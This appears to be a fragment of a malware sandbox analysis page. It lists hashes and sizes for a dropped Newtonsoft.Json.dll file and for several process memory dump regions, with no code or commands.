7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
memory/1640-243-0x000000006F510000-0x000000006FABB000-memory.dmp

Filesize
5.7MB

Download
memory/1640-275-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1640-261-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1640-248-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/1640-232-0x000000006F510000-0x000000006FABB000-memory.dmp

Filesize
5.7MB

Download
memory/1640-340-0x000000006F510000-0x000000006FABB000-memory.dmp

Filesize
5.7MB

Download
memory/1708-0-0x0000000000C60000-0x0000000000D4A000-memory.dmp

Filesize
936KB

Download
memory/1708-332-0x0000000005300000-0x00000000053B0000-memory.dmp

Filesize
704KB

Download
memory/1708-337-0x0000000074670000-0x0000000074D5E000-memory.dmp

Filesize
6.9MB

Download
memory/1708-339-0x0000000004D50000-0x0000000004D90000-memory.dmp

Filesize
256KB

Download
memory/1708-338-0x0000000074670000-0x0000000074D5E000-memory.dmp

Filesize
6.9MB

Download
memory/1708-2-0x0000000004D50000-0x0000000004D90000-memory.dmp

Filesize
256KB

Download
memory/1708-1-0x0000000074670000-0x0000000074D5E000-memory.dmp

Filesize
6.9MB

Download